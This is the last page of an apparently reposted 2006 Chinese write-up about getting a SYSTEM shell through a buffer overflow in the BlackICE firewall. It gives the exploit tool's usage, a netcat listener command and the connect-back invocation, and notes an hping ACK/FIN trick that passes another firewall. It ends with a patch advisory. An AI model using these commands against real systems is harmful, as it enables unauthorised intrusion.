WEB开发网
开发学院网络安全黑客技术 一次意外的入侵经历---黑冰防火墙溢出攻击 阅读

一次意外的入侵经历---黑冰防火墙溢出攻击

 2006-11-06 20:02:34 来源:WEB开发网   
核心提示: - Samcompiled by 无敌最寂寞@ringz.orgblackhit <hostname> <listenhost> <listen port>listenhost, port: connect back host and port参数不多,

- Sam

compiled by 无敌最寂寞@ringz.org

blackhit <hostname> <listenhost> <listen port>

listenhost, port: connect back host and port

参数不多,blackhit 目标主机的ip 本地监听的ip  本地监听的端口。

OK!激动人心的时刻到了,再打开一个cmd,输入nc -v -l -p 518。然后另一个cmd输入blackhit 192.168.203.2 192.168.203.16 518。运行结果如图四。

嘎嘎!!得到shell了,看看是什么权限哦!如图五!

果然是system权限!真是说不出的心情,就这么意外的得到了权限,成功的入侵目标主机!

事情到此也就结束了,跟那个老师坦白后,我们两个都很尴尬,最后还是一起去喝了一顿酒!(不打不相识啊!^_^)

事后我又在实验室重新做了一次溢出测试,结果发现当溢出成功后,目标系统没有任何反应,但是防火墙就跟僵死在那,你也可以照常打开,设置防火墙。但是防火墙不会再记录任何入侵日志了!而且你只能重新启动机器才能恢复防火墙,我尝试停止防火墙的服务然后再启动服务,结果在启动的时候提示说“服务的实例已在运行中”说明在溢出的时候造成了服务进程blackd.exe假死的现象。所以只有重新启动才能恢复正常。

此次经历让我对防火墙产生了浓厚的兴趣,又接二连三的测试了不少防火墙的安全性,其中在测试天网防火墙的时候发现,尽管防火墙处于最高安全级别,但是利用hping一样可以绕过防火墙ping通后面的主机,具体方法就是将发送的数据包的ACK位或者FIN为置位,这样防火墙就放行了!由于此类问题不在本文的讨论范围内了,有兴趣的读者可以自行实验试一下!

4、后记

写完这篇稿子我总算可以松一口气了,关于这个漏洞我再补充几句,其实类似这样的漏洞有很多比如想wsftp等的溢出漏洞,此类漏洞是可遇不可求的,你如果非要用这个漏洞去找寻什么肉鸡的话,那么我劝你还是别大海捞针了!

同时要说明的是ISS后续推出的ccg和cch版本的blackcie已经补上了此漏洞,请使用该防火墙的朋友赶紧升级吧!

上一页  1 2 3 4 5 6 

Tags:一次 意外 入侵

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接